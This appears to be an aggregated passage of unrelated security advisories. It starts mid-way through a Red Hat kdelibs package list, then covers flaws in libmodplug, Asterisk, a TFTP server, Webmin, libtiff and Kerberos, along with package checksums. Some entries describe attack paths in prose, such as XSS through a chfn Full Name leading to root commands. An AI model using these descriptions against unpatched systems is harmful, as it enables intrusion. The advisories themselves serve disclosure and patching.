• kdelibs-debuginfo-4.3.4-11.el6_0.2.i686.rpm

x86_64:

• kdelibs-4.3.4-11.el6_0.2.i686.rpm
• kdelibs-4.3.4-11.el6_0.2.x86_64.rpm
• kdelibs-common-4.3.4-11.el6_0.2.x86_64.rpm
• kdelibs-debuginfo-4.3.4-11.el6_0.2.i686.rpm
• kdelibs-debuginfo-4.3.4-11.el6_0.2.x86_64.rpm

Red Hat Enterprise Linux Desktop Optional (v. 6):

Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Client/en/os/SRPMS/kdelibs-4.3.4-11.el6_0.2.src.rpm

i386:

• kdelibs-debuginfo-4.3.4-11.el6_0.2.i686.rpm
• kdelibs-devel-4.3.4-11.el6_0.2.i686.rpm

noarch:

• kdelibs-apidocs-4.3.4-11.el6_0.2.noarch.rpm

x86_64:

• kdelibs-debuginfo-4.3.4-11.el6_0.2.i686.rpm
• kdelibs-debuginfo-4.3.4-11.el6_0.2.x86_64.rpm
• kdelibs-devel-4.3.4-11.el6_0.2.i686.rpm
• kdelibs-devel-4.3.4-11.el6_0.2.x86_64.rpm

Red Hat Enterprise Linux HPC Node Optional (v. 6):

Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6ComputeNode/en/os/SRPMS/kdelibs-4.3.4-11.el6_0.2.src.rpm

noarch:

• kdelibs-apidocs-4.3.4-11.el6_0.2.noarch.rpm

x86_64:

• kdelibs-4.3.4-11.el6_0.2.i686.rpm
• kdelibs-4.3.4-11.el6_0.2.x86_64.rpm
• kdelibs-common-4.3.4-11.el6_0.2.x86_64.rpm
• kdelibs-debuginfo-4.3.4-11.el6_0.2.i686.rpm
• kdelibs-debuginfo-4.3.4-11.el6_0.2.x86_64.rpm
• kdelibs-devel-4.3.4-11.el6_0.2.i686.rpm
• kdelibs-devel-4.3.4-11.el6_0.2.x86_64.rpm

Red Hat Enterprise Linux Server (v. 6):

Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/kdelibs-4.3.4-11.el6_0.2.src.rpm

i386:

• kdelibs-4.3.4-11.el6_0.2.i686.rpm
• kdelibs-common-4.3.4-11.el6_0.2.i686.rpm
• kdelibs-debuginfo-4.3.4-11.el6_0.2.i686.rpm
• kdelibs-devel-4.3.4-11.el6_0.2.i686.rpm

noarch:

• kdelibs-apidocs-4.3.4-11.el6_0.2.noarch.rpm

ppc64:

• kdelibs-4.3.4-11.el6_0.2.ppc.rpm
• kdelibs-4.3.4-11.el6_0.2.ppc64.rpm
• kdelibs-common-4.3.4-11.el6_0.2.ppc64.rpm
• kdelibs-debuginfo-4.3.4-11.el6_0.2.ppc.rpm
• kdelibs-debuginfo-4.3.4-11.el6_0.2.ppc64.rpm
• kdelibs-devel-4.3.4-11.el6_0.2.ppc.rpm
• kdelibs-devel-4.3.4-11.el6_0.2.ppc64.rpm

s390x:

• kdelibs-4.3.4-11.el6_0.2.s390.rpm
• kdelibs-4.3.4-11.el6_0.2.s390x.rpm
• kdelibs-common-4.3.4-11.el6_0.2.s390x.rpm
• kdelibs-debuginfo-4.3.4-11.el6_0.2.s390.rpm
• kdelibs-debuginfo-4.3.4-11.el6_0.2.s390x.rpm
• kdelibs-devel-4.3.4-11.el6_0.2.s390.rpm
• kdelibs-devel-4.3.4-11.el6_0.2.s390x.rpm

x86_64:

• kdelibs-4.3.4-11.el6_0.2.i686.rpm
• kdelibs-4.3.4-11.el6_0.2.x86_64.rpm
• kdelibs-common-4.3.4-11.el6_0.2.x86_64.rpm
• kdelibs-debuginfo-4.3.4-11.el6_0.2.i686.rpm
• kdelibs-debuginfo-4.3.4-11.el6_0.2.x86_64.rpm
• kdelibs-devel-4.3.4-11.el6_0.2.i686.rpm
• kdelibs-devel-4.3.4-11.el6_0.2.x86_64.rpm

Red Hat Enterprise Linux Workstation (v. 6):

Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/kdelibs-4.3.4-11.el6_0.2.src.rpm

i386:

• kdelibs-4.3.4-11.el6_0.2.i686.rpm
• kdelibs-common-4.3.4-11.el6_0.2.i686.rpm
• kdelibs-debuginfo-4.3.4-11.el6_0.2.i686.rpm
• kdelibs-devel-4.3.4-11.el6_0.2.i686.rpm

noarch:

• kdelibs-apidocs-4.3.4-11.el6_0.2.noarch.rpm

x86_64:

• kdelibs-4.3.4-11.el6_0.2.i686.rpm
• kdelibs-4.3.4-11.el6_0.2.x86_64.rpm
• kdelibs-common-4.3.4-11.el6_0.2.x86_64.rpm
• kdelibs-debuginfo-4.3.4-11.el6_0.2.i686.rpm
• kdelibs-debuginfo-4.3.4-11.el6_0.2.x86_64.rpm
• kdelibs-devel-4.3.4-11.el6_0.2.i686.rpm
• kdelibs-devel-4.3.4-11.el6_0.2.x86_64.rpm

These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package

M. Lucinskij and P. Tumenas discovered a buffer overflow in the code for processing S3M tracker files in the Modplug tracker music library, which may result in the execution of arbitrary code.

This advisory references vulnerabilities in products which run on platforms other than Debian.

 It is recommended that administrators running libmodplug check for an updated version of the software for their operating system.

For the oldstable distribution (lenny), this problem has been fixed in version 0.8.4-1+lenny2.

For the stable distribution (squeeze), this problem has been fixed in version 1:0.8.8.1-1+squeeze1.

For the unstable distribution (sid), this problem has been fixed in version 1:0.8.8.2-1.

We recommend that you upgrade your libmodplug packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/

 It is possible for a user of the Asterisk Manager Interface to bypass a security check and execute shell commands when they should not have hat ability. Sending the "Async" header with the "Application" header during an Originate action, allows authenticated manager users to execute shell commands. Only users with the "system" privilege should be able to do this.

Affected Versions:

Asterisk Open Source 1.4.x All versions
Asterisk Open Source 1.6.1.x All versions
Asterisk Open Source 1.6.2.x All versions
Asterisk Open Source 1.8.x All versions
Asterisk Business Edition C.x.x All versions

 Asterisk now performs the proper access check where appropriate during the originate manager action.

Corrected In:

Asterisk Open Source 1.4.40.1, 1.6.1.25, 1.6.2.17.3, 1.8.3.3
Asterisk Business Edition C.3.6.4

Patches:

http://downloads.asterisk.org/pub/security/AST-2011-006-1.4.diff
http://downloads.asterisk.org/pub/security/AST-2011-006-1.6.1.diff
http://downloads.asterisk.org/pub/security/AST-2011-006-1.6.2.diff
http://downloads.asterisk.org/pub/security/AST-2011-006-1.8.diff

The vulnerability is caused by an error in the "TFTPD.EXE" which causes the server to crash when no acknowledgement response is sent back to the server after a successful 'read'.

Successful exploitation could allow an attacker to crash a vulnerable server.

 Not available.

Webmin is affected by a XSS vulnerability in all versions prior to and including 1.540. Webmin fails to sanitize $real in useradmin/index.cgi. $real is the "Full Name" in the finger information of the user. useradmin/index.cgi is the control panel of the "Users & Groups" section in webmin.

An attacker that has a normal user on the victim's machine could be able to change his Full Name with chfn command, inject XSS and execute commands as root.

The updated packages have been patched to correct this issue.

A vulnerability has been found and corrected in libtiff: The libtiff OJPEG decoder contains a heap buffer overflow when decoding certain malformed data (CVE-2009-5022).

The updated packages have been patched to correct this issue.

To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.

All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:

gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:

http://www.mandriva.com/security/advisories

If you want to report vulnerabilities, please contact: security_(at)_mandriva.com

Updated Packages:

Mandriva Linux 2010.0:

9ec055d6e65fc69a8d38018f9eb51186 2010.0/i586/libtiff3-3.9.1-4.5mdv2010.0.i586.rpm
f35c40e4194cdcd1e256ea6f624a5027 2010.0/i586/libtiff-devel-3.9.1-4.5mdv2010.0.i586.rpm
1552ac043a818f4c46867d718bb1ff1f 2010.0/i586/libtiff-progs-3.9.1-4.5mdv2010.0.i586.rpm
901b333f9dde4e93395f20eeba7b7d47 2010.0/i586/libtiff-static-devel-3.9.1-4.5mdv2010.0.i586.rpm
b64875e20ffc7ec59c53ba2dc39d217c 2010.0/SRPMS/libtiff-3.9.1-4.5mdv2010.0.src.rpm

Mandriva Linux 2010.0/X86_64:

134243d2e76811bbd44c01d2b78a0e9d 2010.0/x86_64/lib64tiff3-3.9.1-4.5mdv2010.0.x86_64.rpm
10e9e28ba162574c020a5bf9405a98d7 2010.0/x86_64/lib64tiff-devel-3.9.1-4.5mdv2010.0.x86_64.rpm
3326ee29f69655147a272d8ecedb32c8 2010.0/x86_64/lib64tiff-static-devel-3.9.1-4.5mdv2010.0.x86_64.rpm
bd9b80e752f4d93fae3f2841331eb08c 2010.0/x86_64/libtiff-progs-3.9.1-4.5mdv2010.0.x86_64.rpm
b64875e20ffc7ec59c53ba2dc39d217c 2010.0/SRPMS/libtiff-3.9.1-4.5mdv2010.0.src.rpm

Mandriva Linux 2010.1:

7c8b520061e66c9127665190fd617f01 2010.1/i586/libtiff3-3.9.2-2.5mdv2010.2.i586.rpm
5113de338fa1a1f7bb10b5e2a2787ba2 2010.1/i586/libtiff-devel-3.9.2-2.5mdv2010.2.i586.rpm
402a16e674507124f81960a39277ec46 2010.1/i586/libtiff-progs-3.9.2-2.5mdv2010.2.i586.rpm
4b9a7d665d38b4481d522acc2c724704 2010.1/i586/libtiff-static-devel-3.9.2-2.5mdv2010.2.i586.rpm
f891b93309f0014bef4b98f2fdb1f451 2010.1/SRPMS/libtiff-3.9.2-2.5mdv2010.2.src.rpm

Mandriva Linux 2010.1/X86_64:

1ce63cd7f03fe16b3102ec11837dc0bc 2010.1/x86_64/lib64tiff3-3.9.2-2.5mdv2010.2.x86_64.rpm
2bf5c69232a80db7a33c5e9b2dc9b985 2010.1/x86_64/lib64tiff-devel-3.9.2-2.5mdv2010.2.x86_64.rpm
50be134d1c47764a7bc0ffe9102f6eec 2010.1/x86_64/lib64tiff-static-devel-3.9.2-2.5mdv2010.2.x86_64.rpm
85ab69bff389fe697ea79ff212d616de 2010.1/x86_64/libtiff-progs-3.9.2-2.5mdv2010.2.x86_64.rpm
f891b93309f0014bef4b98f2fdb1f451 2010.1/SRPMS/libtiff-3.9.2-2.5mdv2010.2.src.rpm

A vulnerability has been found and corrected in krb5:

The process_chpw_request function in schpw.c in the password-changing functionality in kadmind in MIT Kerberos 5 (aka krb5) 1.7 through 1.9 frees an invalid pointer, which allows remote attackers to execute arbitrary code or cause a denial of service (daemon crash) via a crafted request that triggers an error condition (CVE-2011-0285).

The updated packages have been patched to correct this issue.

To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.

All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:

gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:

http://www.mandriva.com/security/advisories

If you want to report vulnerabilities, please contact: security_(at)_mandriva.com

Updated Packages:

Mandriva Linux 2010.1:

a3beaa4210ef88324b1f7403fe66d49b 2010.1/i586/krb5-1.8.1-5.5mdv2010.2.i586.rpm
5ef9a8a2b65c3cd54237bd486f5f3ea4 2010.1/i586/krb5-pkinit-openssl-1.8.1-5.5mdv2010.2.i586.rpm
53c539adf79bf75de0a69776a41ce9df 2010.1/i586/krb5-server-1.8.1-5.5mdv2010.2.i586.rpm
0d2ec063ef260df774b0fea3a9d7fe63 2010.1/i586/krb5-server-ldap-1.8.1-5.5mdv2010.2.i586.rpm
ad07be92c68b3e9b8a7602e19aa8ab6e 2010.1/i586/krb5-workstation-1.8.1-5.5mdv2010.2.i586.rpm
732f0d7c394a867a71503fb5533c598e 2010.1/i586/libkrb53-1.8.1-5.5mdv2010.2.i586.rpm
363a6990320f5e1bcde2a894521b49f7 2010.1/i586/libkrb53-devel-1.8.1-5.5mdv2010.2.i586.rpm
7e2a03d05b7f86c1ec880eb26c156726 2010.1/SRPMS/krb5-1.8.1-5.5mdv2010.2.src.rpm

Mandriva Linux 2010.1/X86_64:

4e79aa59df474ecc0472c1201d5e373b 2010.1/x86_64/krb5-1.8.1-5.5mdv2010.2.x86_64.rpm
6f66367684ad4633aedc9427153d2a5a 2010.1/x86_64/krb5-pkinit-openssl-1.8.1-5.5mdv2010.2.x86_64.rpm
41b1af27fd23b3ede880484cd3775688 2010.1/x86_64/krb5-server-1.8.1-5.5mdv2010.2.x86_64.rpm
b5d9b7db106f4df3501a527054a1b5e2 2010.1/x86_64/krb5-server-ldap-1.8.1-5.5mdv2010.2.x86_64.rpm
78964ab9b21c5cc2ddb7e7d09f5496ce 2010.1/x86_64/krb5-workstation-1.8.1-5.5mdv2010.2.x86_64.rpm
715dad0872aac4d013dec2b5f022fe70 2010.1/x86_64/lib64krb53-1.8.1-5.5mdv2010.2.x86_64.rpm
3d605d0edfff276d65d41c5d5ed8eef2 2010.1/x86_64/lib64krb53-devel-1.8.1-5.5mdv2010.2.x86_64.rpm
7e2a03d05b7f86c1ec880eb26c156726 2010.1/SRPMS/krb5-1.8.1-5.5mdv2010.2.src.rpm

Mandriva Enterprise Server 5:

62e270c8bb4276b9883f5fad04373ea4 mes5/i586/krb5-1.8.1-0.6mdvmes5.2.i586.rpm
ef7eb35fda701aae33c23cdd41b2566e mes5/i586/krb5-pkinit-openssl-1.8.1-0.6mdvmes5.2.i586.rpm
4a19294f600f7f5fa40defc2bba50089 mes5/i586/krb5-server-1.8.1-0.6mdvmes5.2.i586.rpm
2fe89c0a2a2a0618f1c363c622dcaa68 mes5/i586/krb5-server-ldap-1.8.1-0.6mdvmes5.2.i586.rpm
1809ee8a5570aabe32e43f26686b4ab1 mes5/i586/krb5-workstation-1.8.1-0.6mdvmes5.2.i586.rpm
a8fe576ff818ba02c9c0f8f9665999f8 mes5/i586/libkrb53-1.8.1-0.6mdvmes5.2.i586.rpm
412db60ca1427b5d9f31f387144870c9 mes5/i586/libkrb53-devel-1.8.1-0.6mdvmes5.2.i586.rpm
1a51198ce51d8801ea24af9d0a80a854 mes5/SRPMS/krb5-1.8.1-0.6mdvmes5.2.src.rpm

Mandriva Enterprise Server 5/X86_64:

f7075001482119db8d21c94b6ef334d9 mes5/x86_64/krb5-1.8.1-0.6mdvmes5.2.x86_64.rpm
2c0c2882bb89b432f103fad9431ecbf8 mes5/x86_64/krb5-pkinit-openssl-1.8.1-0.6mdvmes5.2.x86_64.rpm
354082671bb193faaf025ecd33a8d5dd mes5/x86_64/krb5-server-1.8.1-0.6mdvmes5.2.x86_64.rpm
9697894ff2bc038bc5a06c29be265e17 mes5/x86_64/krb5-server-ldap-1.8.1-0.6mdvmes5.2.x86_64.rpm
4592d2d5e020e6efbfe469fd23bc4265 mes5/x86_64/krb5-workstation-1.8.1-0.6mdvmes5.2.x86_64.rpm
50e1b81524aba4f09bc2c60307d1b4b3 mes5/x86_64/lib64krb53-1.8.1-0.6mdvmes5.2.x86_64.rpm
b8f5f879971561726b677e989384c1b6 mes5/x86_64/lib64krb53-devel-1.8.1-0.6mdvmes5.2.x86_64.rpm
1a51198ce51d8801ea24af9d0a80a854 mes5/SRPMS/krb5-1.8.1-0.6mdvmes5.2.src.rpm